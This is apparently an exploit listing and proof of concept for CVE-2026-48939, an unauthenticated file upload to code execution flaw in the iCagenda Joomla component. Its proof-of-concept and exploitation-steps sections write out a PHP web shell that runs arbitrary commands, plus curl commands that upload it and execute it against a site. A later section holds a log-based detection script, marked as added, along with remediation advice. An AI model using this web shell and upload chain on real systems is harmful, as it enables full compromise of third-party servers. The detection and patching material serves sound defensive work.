ICagenda 3.9.14 / 4.0.7 Shell Upload

29 Jun 2026 00:00:00
Reported by: Polosss
Type: packetstorm
Source: packetstorm.news
34 Views

CVE-2026-48939 exposes unauthenticated iCagenda file uploads that allow remote code execution on Joomla sites.

# CVE-2026-48939 - iCagenda Unauthenticated File Upload to RCE

## Overview

| Field | Value |
|-------|-------|
| **CVE ID** | CVE-2026-48939 |
| **CVSS 4.0 Score** | 10.0 Critical |
| **CVSS Vector** | CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H |
| **CWE** | CWE-284: Improper Access Control |
| **Affected Versions** | iCagenda 3.2.1 - 3.9.14 and 4.0.0 - 4.0.7 |
| **Fixed In** | iCagenda 4.0.8 and 3.9.15 |
| **Published** | 20 June 2026 |

## Vulnerability Description

iCagenda, a popular events and calendar component for Joomla, contains an unauthenticated file upload vulnerability that allows remote attackers to upload and execute arbitrary PHP code on Joomla 6 sites.

### Technical Details

The vulnerability exists in the frontend event submission form's file attachment feature:

1. **Missing Access Control**: The submit endpoint (`index.php?option=com_icagenda&task=registration.submit`) does not enforce authentication, bypassing the "Registered Only" access setting.

2. **No File Validation**: Uploaded files are saved with their original extension without:
   - Extension allowlist validation
   - MIME type verification
   - File content inspection

3. **Direct File Write**: Files are written to `/images/icagenda/frontend/attachments/[filename]` directly under the web root.

4. **PHP Execution**: On Joomla 6, the uploaded `.php` files are executable, leading to Remote Code Execution (RCE).

## Proof of Concept

### Method 1: Using curl (Single Command)

```bash
# Create PHP shell payload
cat > /tmp/shell.php << 'EOF'
<?php
echo "CVE-2026-48939 - SHELL ACTIVE\n";
if(isset($_GET['cmd'])) {
    echo shell_exec($_GET['cmd'] . " 2>&1");
}
?>
EOF

# Upload the shell
curl -k -s \
  -F "title=Test Event" \
  -F "jform[attachment]=@/tmp/shell.php;type=application/x-php" \
  "https://poloss-jomola.ddev.site/icagenda_submit.php"

# Execute commands via uploaded shell
curl -k "https://poloss-jomola.ddev.site/images/icagenda/frontend/attachments/[SHELL_FILENAME].php?cmd=whoami"
```

### Method 2: Using PoC Script

```bash
# Navigate to project directory

# Run PoC script
./CVE-2026-48939-PoC.sh https://poloss-jomola.ddev.site
```
    
## Exploitation Steps

1. **Identify vulnerable endpoint**:
   ```
   https://target.com/index.php?option=com_icagenda&task=submit
   ```

2. **Upload PHP web shell**:
   ```bash
   curl -X POST -F "jform[attachment]=@shell.php" \
     "https://target.com/index.php?option=com_icagenda&task=submit"
   ```

3. **Execute shell**:
   ```bash
   curl "https://target.com/images/icagenda/frontend/attachments/shell_TIMESTAMP.php?cmd=id"
   ```
    
## Impact

- **Confidentiality**: Complete loss of confidentiality - attacker can read all files
- **Integrity**: Complete loss of integrity - attacker can modify all data
- **Availability**: Complete loss of availability - attacker can deny service
- **Remote Code Execution**: Full server compromise

## Attack Signature

Based on real-world exploitation logs, the attack signature is:

```
# Step 1: Upload
POST /index.php?option=com_icagenda&task=submit
User-Agent: icagenda-batch/1.0
Content-Disposition: form-data; name="jform[attachment]"; filename="shell.php"

# Step 2: Execute
GET /images/icagenda/frontend/attachments/shell.php?cmd=...
User-Agent: icagenda-batch/1.0
```
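Detection logic for the signature above, written as an added example that is not part of the advisory: it parses combined-format web server access logs (the sample lines are constructed), flags any request for a PHP-like file under the attachments path, which should only ever serve static files, and escalates the finding when the same client POSTed to an iCagenda submit task shortly before. The `icagenda-batch/1.0` user agent is reported only as a supplementary indicator, since it is trivially changed.

```python
"""Detect the CVE-2026-48939 upload-then-execute pattern in combined-format access logs (added example; SAMPLE_LOG is constructed)."""
import re
from datetime import datetime, timedelta

# Apache/nginx "combined" format: ip ident user [time] "method path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Both task names quoted in the advisory (task=submit and task=registration.submit).
SUBMIT_RE = re.compile(r'option=com_icagenda&task=(registration\.)?submit\b')
# Any PHP-like file requested from the attachments directory, which should hold static files only.
ATTACH_PHP_RE = re.compile(r'^/images/icagenda/frontend/attachments/[^/?]+\.(php\d?|phtml|phar)\b')
KNOWN_UA = 'icagenda-batch/1.0'  # user agent reported in the advisory's exploitation logs

SAMPLE_LOG = [  # constructed for this example; RFC 5737 documentation addresses
    '203.0.113.7 - - [29/Jun/2026:10:15:01 +0000] "POST /index.php?option=com_icagenda&task=submit HTTP/1.1" 303 - "-" "icagenda-batch/1.0"',
    '203.0.113.7 - - [29/Jun/2026:10:15:03 +0000] "GET /images/icagenda/frontend/attachments/shell_1782375301.php?cmd=id HTTP/1.1" 200 512 "-" "icagenda-batch/1.0"',
    '198.51.100.22 - - [29/Jun/2026:10:20:00 +0000] "GET /images/icagenda/frontend/attachments/agenda.pdf HTTP/1.1" 200 40213 "-" "Mozilla/5.0"',
    '198.51.100.22 - - [29/Jun/2026:10:21:00 +0000] "POST /index.php?option=com_icagenda&task=registration.submit HTTP/1.1" 303 - "-" "Mozilla/5.0"',
    '192.0.2.9 - - [29/Jun/2026:11:00:00 +0000] "GET /images/icagenda/frontend/attachments/shell.php?cmd=whoami HTTP/1.1" 404 - "-" "curl/8.5.0"',
]

def parse(line):
    """Return the fields of one combined-format line as a dict, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    e = m.groupdict()
    e['ts'] = datetime.strptime(e['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return e

def detect(lines, window=timedelta(minutes=10)):
    """Flag PHP requests under the attachments path; 'critical' if the same client hit a submit task within `window`."""
    findings, last_submit = [], {}
    for raw in lines:
        e = parse(raw)
        if e is None:
            continue
        if e['method'] == 'POST' and SUBMIT_RE.search(e['path']):
            last_submit[e['ip']] = e['ts']  # remember the latest upload attempt per client
        elif ATTACH_PHP_RE.match(e['path']):
            prior = last_submit.get(e['ip'])
            chained = prior is not None and timedelta(0) <= e['ts'] - prior <= window
            findings.append({'ip': e['ip'], 'path': e['path'], 'status': e['status'],
                             'severity': 'critical' if chained else 'high', 'known_ua': e['ua'] == KNOWN_UA})
    return findings
```

A 404 on the execute step (as in the last sample line) still matters: it shows someone probing for a dropped shell, so the finding is kept at 'high' rather than discarded.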
    
## Remediation

1. **Immediate**: Update iCagenda to version 4.0.8 (or 3.9.15 for legacy branch)
2. **Alternative**: Remove or rename `com_icagenda` folders temporarily
3. **Note**: Unpublishing the component does NOT protect against this vulnerability

## References

- [iCagenda Zero Day RCE - mysites.guru](https://mysites.guru/blog/icagenda-zero-day-file-upload-rce/)
- [iCagenda Official](https://www.icagenda.com/)
- [Changelog 4.0.8](https://www.icagenda.com/docs/changelog/icagenda-4-0-8)
- [CISA ADP Advisory](https://www.cisa.gov/news-events/alerts)

## Disclaimer

This PoC is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.


29 Jun 2026 00:00 (current)
Vulners AI Score: 6.2 (Medium risk)
CVSS 3.1: 9.8
CVSS 4: 10
EPSS: 0.00522
34 Views